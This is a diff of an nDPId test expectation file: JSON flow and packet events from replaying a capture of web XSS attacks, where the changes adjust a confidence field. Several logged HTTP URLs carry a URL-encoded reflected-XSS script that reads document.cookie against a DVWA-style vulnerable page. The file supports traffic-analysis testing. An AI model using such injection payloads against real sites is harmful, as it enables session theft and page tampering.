-01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347547687,"flow_last_seen":1499347551497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347551497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27MRVS1VO9FLO4CFA5FLJ13I9GULOFH69WHOJQ0PH0OKE2FMG3MQ%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347547687,"flow_last_seen":1499347551497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347551497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27MRVS1VO9FLO4CFA5FLJ13I9GULOFH69WHOJQ0PH0OKE2FMG3MQ%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347552736,"flow_last_seen":1499347552736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347552736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1499347552736,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347552736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8B91AAD4GvfOsEAABwKgKMuQuAFCEqySZAAAAAKACchCswQAAAgQFtAQCCAoBOyNEAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":2,"flow_last_seen":1499347552736,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347552736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5C6xPoYyhKskmqAScSB9kQAAAgQFtAQCCAoD5PS5ATsjRAEDAwc="} 
@@ -2108,7 +2108,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1499347607344,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347607344,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8neJAAD4GJ+6sEAABwKgKMuZ6AFBKtMV6AAAAAKACchAONwAAAgQFtAQCCAoBO1iYAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5342,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":2,"flow_last_seen":1499347607344,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347607344,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5nrlgxvESrTFe6AScSDf2wAAAgQFtAQCCAoD5SoNATtYmAEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5343,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":3,"flow_last_seen":1499347607345,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347607345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0neNAAD4GJ\/WsEAABwKgKMuZ6AFBKtMV75YMbxYAQAOV+4wAAAQEICgE7WJgD5SoN"} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347419786,"flow_last_seen":1499347486791,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232681,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347419786,"flow_last_seen":1499347486791,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232681,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347474100,"flow_last_seen":1499347479744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347474100,"flow_last_seen":1499347479744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347475384,"flow_last_seen":1499347480745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -2137,7 +2137,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1499347613718,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347613718,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VmlAAD4Gb2esEAABwKgKMua+AFCqCgi7AAAAAKACchBlIgAAAgQFtAQCCAoBO17SAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5401,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":2,"flow_last_seen":1499347613719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347613719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5r4KHPZlqgoIvKAScSAxUwAAAgQFtAQCCAoD5TBHATte0gEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5402,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":3,"flow_last_seen":1499347613719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347613719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VmpAAD4Gb26sEAABwKgKMua+AFCqCgi8Chz2ZoAQAOXQWgAAAQEICgE7XtID5TBH"} 
-00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5418,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347611162,"flow_last_seen":1499347615984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347615984,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5418,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347611162,"flow_last_seen":1499347615984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347615984,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347616210,"flow_last_seen":1499347616210,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347616210,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1499347616210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347616210,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YLdAAD4GZRmsEAABwKgKMubYAFBJnwH3AAAAAKACchDJyQAAAgQFtAQCCAoBO2FAAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":2,"flow_last_seen":1499347616211,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347616211,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5thWFuJlSZ8B+KAScSBbkQAAAgQFtAQCCAoD5TK2ATthQAEDAwc="} 
@@ -2360,7 +2360,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1499347678198,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347678198,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86nhAAD4G21esEAABwKgKMuluAFCn23eyAAAAAKACchC2sQAAAgQFtAQCCAoBO53KAAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":2,"flow_last_seen":1499347678198,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347678198,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6W5MMi3pp9t3s6AScSDKUAAAAgQFtAQCCAoD5W8\/ATudygEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5948,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":3,"flow_last_seen":1499347678199,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347678199,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06nlAAD4G216sEAABwKgKMuluAFCn23ezTDIt6oAQAOVpWAAAAQEICgE7ncoD5W8\/"} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347484263,"flow_last_seen":1499347551239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347484263,"flow_last_seen":1499347551239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347545176,"flow_last_seen":1499347550764,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347545176,"flow_last_seen":1499347550764,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347546427,"flow_last_seen":1499347551497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58346,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -2375,7 +2375,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1499347679469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347679469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80KNAAD4G9SysEAABwKgKMul8AFCXJE+kAAAAAKACchDuKwAAAgQFtAQCCAoBO58HAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5962,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":2,"flow_last_seen":1499347679469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347679469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6XyRTq6MlyRPpaAScSA6zgAAAgQFtAQCCAoD5XB8ATufBwEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5963,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":3,"flow_last_seen":1499347679470,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347679470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00KRAAD4G9TOsEAABwKgKMul8AFCXJE+lkU6ujYAQAOXZ1AAAAQEICgE7nwgD5XB8"} 
-01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347675703,"flow_last_seen":1499347679471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347679471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27SZGGJRXX6DR9VWKN864H8LTBEZ6QC3GJPC8TUUNAED3BBL4L8P%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347675703,"flow_last_seen":1499347679471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347679471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27SZGGJRXX6DR9VWKN864H8LTBEZ6QC3GJPC8TUUNAED3BBL4L8P%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347680746,"flow_last_seen":1499347680746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347680746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1499347680746,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347680746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qSxAAD4GHKSsEAABwKgKMumKAFCMLAlrAAAAAKACchA+DwAAAgQFtAQCCAoBO6BHAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5975,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":2,"flow_last_seen":1499347680746,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347680746,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6YpeBd3IjCwJbKAScSCNfgAAAgQFtAQCCAoD5XG8ATugRwEDAwc="} 
@@ -2592,7 +2592,7 @@ 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347612465,"flow_last_seen":1499347617785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347613718,"flow_last_seen":1499347618787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347613718,"flow_last_seen":1499347618787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
